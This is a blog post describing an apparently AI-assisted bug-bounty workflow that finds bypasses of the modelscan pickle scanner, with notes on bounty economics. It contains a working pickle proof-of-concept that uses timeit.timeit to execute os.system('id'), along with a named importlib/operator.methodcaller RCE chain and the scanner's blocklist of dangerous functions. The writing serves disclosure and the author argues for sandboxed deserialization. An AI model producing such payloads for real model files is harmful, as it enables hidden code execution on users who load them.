I Built a $70K Security Bounty Pipeline with AI — Here's the Exact Workflow

Last month I started systematically scanning open-source ML repositories for security vulnerabilities using Claude Code. 33 days later, I have 113 confirmed vulnerabilities across a single project, a pipeline worth $62K-$158K in bounties, and a repeatable process anyone can use.

Here's exactly how it works.

The Target: ML Model Security Scanners

ML model files (pickle, PyTorch, TensorFlow SavedModel) can contain arbitrary code that executes on load. Tools like modelscan exist to detect malicious payloads before they run. The question I asked: how good are these scanners, really?

Answer: not good enough. I found 116 distinct bypass techniques that pass the latest version (0.8.8) with "No issues found!"

The Workflow

Step 1: Map the Attack Surface

Every scanner works on a blocklist — a list of known dangerous functions. The vulnerability isn't in what they block, it's in what they miss.

# Extract the blocklist from modelscan source
BLOCKED = {
    "os.system", "subprocess.call", "builtins.exec",
    "builtins.eval", "shutil.rmtree", ...
}

# Python stdlib has 300+ modules
# The blocklist covers ~40 functions
# That leaves 260+ modules to explore

I wrote a script that enumerates every stdlib module and checks which ones contain exec(), eval(), system(), or file I/O calls — and aren't on the blocklist.

Step 2: Generate Proof-of-Concept Payloads

For each unblocked module, I built a pickle payload that demonstrates the vulnerability:

import pickle
import struct

class MaliciousPayload:
    """Generates pickle bytecode that calls unblocked functions"""

    def __reduce__(self):
        # timeit.timeit calls exec() on the first argument
        import timeit
        return (timeit.timeit, (
            "__import__('os').system('id')",  # arbitrary command
            "pass",  # setup
            None,    # timer
            1        # number of executions
        ))

# Save as .pkl — modelscan says "No issues found!"
with open("bypass.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

The key insight: Python's timeit.timeit() internally calls exec() on whatever string you pass it. It's not on any blocklist because it's a benchmarking tool. But it's a full RCE primitive.

Step 3: Verify and Classify

Every bypass gets tested against the latest scanner version and classified by severity:

Severity	Criteria	Count
CRITICAL	Full RCE — arbitrary command execution	18
HIGH	File read/write, SSRF, or code loading	24
MEDIUM	DoS, resource exhaustion, info disclosure	31
LOW	Limited impact or requires chaining	43

The 18 critical RCE chains are devastating. My favorite: importlib.import_module('os') combined with operator.methodcaller('system', 'whoami'). This single chain defeats the entire blocklist because importlib can load any module dynamically.

Step 4: Create Reproducible Evidence

Each vulnerability gets a public HuggingFace repository with:

• The malicious model file
• A README explaining the bypass
• Scan output proving it passes

113 repos. All public. All verified on modelscan 0.8.8.

Step 5: Automated Scanning at Scale

This is where Claude Code skills become powerful. Instead of manually auditing each module, I built a security scanning skill that:

1. Parses Python source for dangerous function calls
2. Cross-references against known blocklists
3. Generates PoC payloads automatically
4. Runs the target scanner to verify the bypass

The API Connector skill handles the HuggingFace API integration — uploading repos, managing model cards, batch operations across 113 repositories.

What I Learned About the Bounty Market

The Math

• Time invested: ~40 hours over 33 days
• Pipeline value: $62K-$158K (depending on per-report vs. bulk pricing)
• Hourly rate if paid: $1,550-$3,950/hr
• Current payout: $0 (submissions pending)

That last line matters. Pipeline ≠ revenue. The bottleneck isn't finding vulnerabilities — it's the submission and review process.

What Actually Pays

After scanning 1,700+ bounty issues across 13 platforms (Algora, HackerOne, Huntr, Expensify, GitHub bounty labels), here's what I found:

Pays well ($250-$3,000/vuln):

• Security vulnerabilities in ML/AI tools (Huntr)
• Expensify bugs ($250 each, but requires Upwork account)
• Infrastructure bounties (SigNoz dashboards: $150-$250 each)

Doesn't pay (or pays pennies):

• Generic code bounties on Algora (bone dry above $100)
• FinMind-style bounty farms (30+ bot submissions per issue)
• "Good first issue" tagged bounties (overcrowded within minutes)

Surprise winner: content bounties. Thesys pays $50-$100 per technical article about their OpenUI framework. I submitted 4 articles in one session. Lower ceiling, but guaranteed payout and zero competition.

The Tool Stack

For anyone building a similar workflow, here's what I use:

1. Claude Code — the AI brain. Reads source code, identifies patterns, generates payloads
2. Semgrep — static analysis for initial triage
3. Custom Python scripts — payload generation and scanner verification
4. HuggingFace Hub API — automated repo creation and model uploads
5. Dashboard Builder skill — when bounties require building monitoring dashboards (SigNoz pays $150-$250 per dashboard template)

The Fundamental Problem with Blocklists

The deeper lesson: blocklist-based security is fundamentally broken for Python pickle.

Python's stdlib has 300+ modules. Many contain exec(), eval(), or system() calls buried in utility functions. You can't blocklist them all without breaking legitimate use. And even if you did, importlib.import_module() lets you load any module dynamically, making the entire blocklist concept moot.

The fix isn't a bigger blocklist. It's sandboxed deserialization — running pickle loads in an isolated environment where even successful code execution can't escape. That's a much harder engineering problem, which is why most tools still use blocklists.

Getting Started

If you want to try security bounty hunting with AI:

1. Pick a narrow target. Don't scan everything. Pick one tool, one vulnerability class, go deep.
2. Read the source. Blocklists, allowlists, and parsers all have edges. Find them.
3. Automate verification. A bypass that hasn't been tested against the latest version isn't a bypass.
4. Document obsessively. Bounty reviewers need reproducible steps, not "trust me it works."
5. Start with content bounties. Lower risk, guaranteed payout, builds reputation while you learn the process.

The tools exist. The vulnerabilities exist. The bounties exist. The only bottleneck is doing the work.

---

The security scanning workflow described here uses Claude Code skills for automated vulnerability detection. For building API integrations with bounty platforms, check out the API Connector skill. For dashboard bounties, the Dashboard Builder skill generates SigNoz/Grafana templates from metrics specs.